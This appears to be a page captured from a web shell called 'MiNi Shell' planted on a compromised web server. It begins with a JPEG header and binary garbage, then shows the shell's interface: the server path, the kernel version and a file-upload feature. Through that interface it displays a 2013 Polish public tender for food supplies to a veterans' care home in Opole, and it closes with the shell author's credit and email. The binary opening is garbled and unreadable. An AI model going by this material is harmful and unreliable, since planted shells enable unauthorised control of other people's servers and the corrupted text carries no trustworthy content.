JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130114/8003-N-2013.html

<p class="kh_header"><b>Opole: Sukcesywna dostawa  artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole.</b><br>
<b>Numer ogłoszenia: 8003 - 2013; data zamieszczenia: 14.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu , ul. Chmielowicka 6, 45-738 Opole, woj. opolskie, tel. 0-77 4743697, 457 54 95, faks 0-77 4743697, 457 54 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa  artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych różnych o Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole, w ilości i asortymencie wyszczególnionym  w niniejszej specyfikacji istotnych warunków zamówienia                 w pkt. 2 od poz 1 do poz.98. tj. poz.1	Barszcz czerwony  instant - w opakowaniu 150g-180 g  ilość   szt 10, poz.2	Budyń bez cukru różne smaki 1 kg	  ilość 	szt  40, poz.3	bułka tarta 0,5 kg klasa  I	ilość   szt  360, poz.4	Chrzan tarty konserwowy 0,18 kg	 ilość szt	  200, poz.5	Cukier biały 1,00 kg ilość 	szt. 2240, poz.6	Cukier puder 0,50 kg ilość szt  10, poz.7	Cukier waniliowy 0,032 kg  ilość 	szt. 370, poz.8	Cynamon mielony 0,02 kg ilość szt.50, poz.9	Czosnek granulowany 0,02 kg ilość szt. 180, poz.10	Dżem mały różne smaki- 195 g bez cukru słodzony asparanem  ilość 	szt. 990, poz.11	Dżem mały z -c różne smaki nisko słodzony- 0,025 kg ilość 	szt. 3360, poz.12	Dżem z cukrem 280g niskosłodzony   ilość 	szt . 1160, poz.13	Fasola Jaś  - duży, suchy opakowanie foliowe 0,50 kg ilość  szt. 280, poz.14	Gałka muszkatołowa 0,015 kg (cała-mielona)  ilość 	szt. 25, poz.15	Groch żółty suchy łuskany połówki opakowanie foliowe 0,50 kg ilość 	szt. 200, poz.16	Groszek konserwowy 0,40 kg	ilość     	szt. 100, poz.17	Grzyby suszone (podgrzybek)  0,02 kg	ilość  szt	 20, poz.18	Herbata granulowana czarna- 0,10 kg 	ilość  szt. 1050, 
poz.19	Kakao naturalne 0,20 kg	  ilość 	szt. 28, poz.20	Kasza jęczmienna 1,00 kg	 ilość 	szt. 330, poz.21	Kasza kukurydziana 0,40 kg ilość 	szt. 220, poz.22	Kasza gryczana1kg	ilość  szt. 150, poz.23	Kutia 0,5kg- (kasza-pszenica łuskana)	ilość szt	 12, poz.24	Kasza manna  w kg	ilość kg	 420, poz.25	kawa zbożowa 0,50 kg	ilość szt	350, poz.26	ketchup łagodny 0,50 kg- (37 % koncentratu)  ilość 	szt  350, poz.27	Kleik ryżowy błyskawiczny- 0,20 kg      ilość szt. 100, poz.28	Kminek cały 0,015 kg	ilość szt .60
poz.29	Koncentrat barszczu czerwonego w płynie 0,300 l min 25%	 ilość  szt. 180, poz.30	Koncentrat pomidorowy 30%  0,9 l.  ilość 	szt.  240, poz.31	Konserwa rybna makrela w oleju 170 g 	  ilość 	szt  190, poz.32	Konserwa rybna makrela w pomidorach 170 g	ilość szt	 190, poz.33	Koper suszony 0,01kg	 ilość  szt  120, poz.34	Kukurydza konserwowa 0,40 kg	ilość 	szt. 80, poz.35	Kwasek cytrynowy 0,02 kg	ilość 	szt. 110, poz.36	Liście laurowe 0,012 kg		ilość  szt. 150, poz.37	Majeranek 0,02		ilość . szt 300, poz.38	Majonez dekoracyjny 0,70 l - (zawartość olej rzepakowy, żółtka jaj 6%, musztarda, ocet, i przyprawy)		 ilość  szt. 160, poz.39	Makaron domowy 5 jajeczny nitka- cięta drobno do rosołu  250g 	ilość szt	 700, poz.40	Makaron z mąki durum - 0,50 kg(świderek, drobne muszelka, kolanko)      ilość szt. 800, poz.41	Makaron zacierkowy 5 jajeczny 0,250kg lub literki 0,25kg, łazanki	ilość szt	 1250, poz.42	Marmolada wieloowocowa twarda 1 kg	ilość szt	 28, poz.43	Marynata ziołowa  do mięsa i drobiu  0,02 kg ilość 	szt. 100, poz.44	Masa makowa puszka 1 kg	ilość szt. 8, poz.45	Mąka pszenna tortowa typ 450 1,00 kg	ilość  szt	 1100, poz.46	Mąka ziemniaczana  1,00 kg   ilość 	szt  210, poz.47	Migdały 0,08 kg lub 0,10kg    ilość 	szt 12, poz.48	Miód  naturalny 0,025 kg	      ilość 	szt. 3000, poz.49	Miód 1300 g-słoik	     ilość           szt	. 2, poz.50	Musztarda - 0,90 l słoik	  ilość 	szt 200, poz.51	Ocet spirytusowy 0,50 l butelka   ilość szt. 	200, poz.52	Olej rzepakowy typu  Kujawski z I-ego tłoczenia rafinowany rzepakowy100%-  1,00 l lub równoważny 	100%olej rzepakowy rafinowany z pierwszego tłoczenia.	ilość szt	 650, poz.53	Orzech włoski 100 g	ilość szt. 20, poz.54	Papryka mielona ostra 0,02 kg	ilość  szt. 80
poz.55	Papryka mielona słodka 0,02 kg	ilość  	szt. 400, poz.56	pasztet drobiowy 0,110kg- foremka  ilość 	szt. 400, poz.57	Pieprz czarny mielony 0,02kg	ilość  	szt  530, poz.58	Pieprz ziołowy 0,02 kg	    ilość 	szt  150
poz.59	Płatki owsiane 0,50 kg ekstra   ilość szt . 270, poz.60	Proszek do pieczenia 0,03 kg	ilość  szt. 30, poz.61	Przyprawa sucha do mięsa i drobiu 0,075 kg typu -Delikat bez glutaminianu sodu	ilość szt	340, poz.62	Przyprawa w płynie  do potraw-  0,90 l	 ilość  szt. 150, poz.63	Przyprawa warzywna do zup sucha -200g typu- wegeta  bez glutaminianu sodu ilość 	szt 400, poz.64	Rodzynki  sułtańskie 0,10 kg	 ilość   szt. 120, poz.65	Ryż długo ziarnisty biały-  1,00 kg	 ilość 	szt. 610, poz.66	Słodzik 1200 tabletek	  ilość 	szt. 10
poz.67	Sok z/c malinowy 0,420 l - 0,50l	  ilość 	szt  420, poz.68	Sos chrzanowy 0,25 kg słoik	 ilość szt  280, poz.69           Sos czosnkowy 0,25 kg słoik	ilość  szt	 160, poz.70	Sos do pieczeni  ciemny 0,03 kg 	ilość  szt	  320, poz.71	Sos tatarski 0,25 kg słoik		ilość  szt	  70, poz.72	Sól kuchenna jodowana kg	ilość szt	  500, poz.73	Suchary bez cukru 0,280 kg	ilość  szt	. 180, poz.74	Suszona gruszka 	  ilość 	kg  2,00, poz.75	Suszone  jabłko	  ilość  	kg. 3,00, poz.76	Szczaw konserwowy 0,30 kg słoik	 ilość szt	. 130, poz.77	Szyneczka delikatesowa wieprzowa 0,110 kg- foremka ilość 	szt  1700, poz.78	Śliwki suszone b/pestki kalifornijskie ilość 	kg. 2,00, poz.79	woda mineralna gazowana 1,5 l	ilość  szt  2030, poz.80	woda mineralna niegazowana 1,5 l  ilość  szt. 4400, poz.81	Ziele angielskie 0,015 kg		ilość  szt	   150, poz.82	Żelatyna spożywcza- 0,05 kg	ilość  szt	  300, poz.83	Żurek   350 g		ilość szt	 180, poz.84          Biszkopty z galaretką w czekoladzie 136 g różne smaki   ilość szt   50 , poz.85          Ciastka kruche z cukrem lub marmoladą 150g -200 g      ilość   szt  50, poz.86          Ciastko markizy 150 g różne smaki  ilość     ilość  szt   50, poz.87        Cukierki czekoladowe miękkie o różnych smakach ( nie dopuszcza się wyrobów czekoladopodobnych) 	ilość   kg  15, poz.88          Czekolada mleczna 100 g  (nie dopuszcza się wyrobów czekoladopodobnych )   ilość  szt.  320, poz.89          Czekoladowy Mikołaj 60g -90 g z czekolady mlecznej      ilość  szt    138, poz.90          herbata ekspresowa - czarna 20 szt.     ilość  szt. 20, poz.91          Herbata rozpuszczalna smakowa - napój 0,30 kg   ilość   szt  40, poz.92         Kawa naturalna mielona 500 g ekstra    ilość szt 10, poz.93          Kawa naturalna rozpuszczalna 100% kawy naturalnej - 0,20 kg  ilość szt 20, poz.94          Paluszki solone 100 g ilość szt. 30, poz.95.         Sok pomarańczowy 1l ( 100 %)  ilość szt. 20 , poz.96          Sok jabłkowy 1l ( 100 %)  ilość  szt 20, poz.97          Sok jabłkowy 0,2 l ( 100 %)   ilość szt. 50, poz.98.         Ciastka wafelki przekładane różne smaki 450 g   ilość szt 30 .
Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych różnych do Domu Pomocy Społecznej dla Kombatantów  ul. Chmielowicka 6, 45-738 Opole, w ilości i asortymencie wskazanym w opisie przedmiotu zamówienia zawartym  w   formularzu rzeczowo -cenowym  stanowiącym  załącznik do niniejszej specyfikacji istotnych warunków zamówienia. 
Przedmiot zamówienia będzie zamawiany partiami, które w treści umowy określane są jako -jednorazowe zamówienie, w zależności od aktualnych potrzeb zamawiającego.
Wielkość jednorazowego zamówienia zostanie każdorazowo uzgodniona telefoniczne lub poprzez pisemne zgłoszenie w terminie do 2 dni przed odbiorem licząc od chwili zgłoszenia faksem  od zamawiającego lub według ustalonego harmonogramu, a w sytuacjach szczególnych, na żądanie zamawiającego, także poza tymi dniami.
Odbiór towaru w magazynie zamawiającego- od poniedziałku do piątku w godz. 7:30 - 14:30.

Dostawa przedmiotu zamówienia dokonywana będzie sukcesywnie partiami  średnio raz w tygodniu, w dniu roboczym. Wykonawca zamówiony towar będzie dostarczał do siedziby Zamawiającego własnym transportem zgodnie z wymogami określonymi w Ustawie z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. nr 171 poz. 1225) wraz z odpowiednimi aktami wykonawczymi. 
Termin przydatności do spożycia, od daty dostawy do Domu Pomocy Społecznej dla Kombatantów w Opolu będzie wynosił minimum dwie trzecie  gwarantowanego przez producenta terminu ważności.

Zamawiający wymaga aby wszystkie dostarczane artykuły spożywcze  posiadały nienaruszone fabryczne jednostkowe opakowanie, oraz  odpowiednie atesty, HDI (handlowe dokumenty identyfikacyjne)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.60.00.00-4, 15.40.00.00-2, 15.83.00.00-5, 15.87.00.00-7, 15.85.00.00-1, 15.98.10.00-8, 15.32.10.00-7, 15.84.20.00-2, 15.86.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o 	spełnianiu 	warunków określonych w art.22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy składając ofertę muszą spełnić ( w przypadku wspólnego ubiegania się o 	udzielenie zamówienia przez dwóch  lub więcej Wykonawców o udzielenie niniejszego 	zamówienia, oceniane będzie ich łączna wiedza i doświadczenie) warunek  posiadania 	wiedzy i doświadczenia, polegający  na wykazaniu się w okresie ostatnich trzech  lat przed 	upływem terminu składania ofert a jeśli okres prowadzenia działalności jest krótszy- w tym 	okresie, należycie wykonanymi  minimum jednej  dostawy ( dostawa realizowana na 	podstawie jednej umowy) odpowiadających swoim rodzajem dostawom stanowiącym 	przedmiot zamówienia, tj. sukcesywne dostawy artykułów spożywczych różnych   na  	kwotę co najmniej 70 000 zł brutto z podaniem ich wartości, przedmiotu, dat wykonania
i odbiorców, oraz  załączeniem dokumentu 	potwierdzającego, że 	dostawy zostały 	wykonane należycie lub  są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu 	warunków określonych w art.22 ust.1 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu 	warunków określonych w art.22 ust.1 Ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu 	warunków określonych w art.22 ust.1 Ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz oferty wypełniony i podpisany przez wykonawcę.
	2.Formularz  rzeczowo cenowy wypełniony i podpisany przez wykonawcę.
	3. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z 	przepisów prawa lub innych dokumentów rejestrowych ( upoważnienie,  pełnomocnictwo).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień z art. 144 ust.1 Ustawy Prawo zamówień Publicznych.             W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić  od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. Dopuszcza się zastosowanie innej stawki i wysokości należnego podatku VAT w przypadku zmiany obowiązujących w tym zakresie przepisów.1. Zamawiającemu  przysługuje prawo odstąpienia od umowy, gdy
		a)  zostanie ogłoszona upadłość Wykonawcy, zostanie wszczęta procedura 			likwidacji Wykonawcy lub Wykonawca zakończy prowadzenie działalności 
		b) w przypadku wszczęcia  postępowania egzekucyjnego, skierowanego do 			majątku Wykonawcy,
		c) Wykonawca nie rozpoczął realizacji przedmiotu umowy bez uzasadnionych 			przyczyn, oraz  nie kontynuuje jej mimo pisemnego wezwania Zamawiającego.
		d) w razie dostarczenia przez Wykonawcę asortymentu o parametrach  				niezgodnych z wymaganiami  określonymi  przez Zamawiającego w SIWZ  w 			szczególności  opisanych w formularzy rzeczowo - cenowym , lub w przypadku 		niedokonania przez Wykonawcę wymiany asortymentu , dostarczanego 				niezgodnie z z wymaganiami Zamawiającego   w terminie. trzech  godzin  			liczonych  od przyjęcia reklamacji przez Wykonawcę .
		e) w razie dostarczenia asortymentu pochodzącego od innego producenta - 			niedeklarowanego w Ofercie przez Wykonawcę.
2. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym,  czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiające może odstąpić od umowy w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego z tytułu  wykonania części umowy.
3. Odstąpienie od umowy może nastąpić wyłącznie w formie pisemnej pod rygorem nieważności .
4. Wykonawcy przysługuje prawo odstąpienia od umowy, jeżeli:  Zamawiający nie wywiązuje się z obowiązku zapłaty faktur w terminie 4 tygodni od dnia, w którym upłynął termin zapłaty określony w  umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej dla Kombatantów w Opolu 45-738,    ul. Chmielowicka 6,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2013 godzina 11:30, miejsce: Dom Pomocy Społecznej dla Kombatantów w Opolu 45-738,   ul. Chmielowicka 6,  sekretariat parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com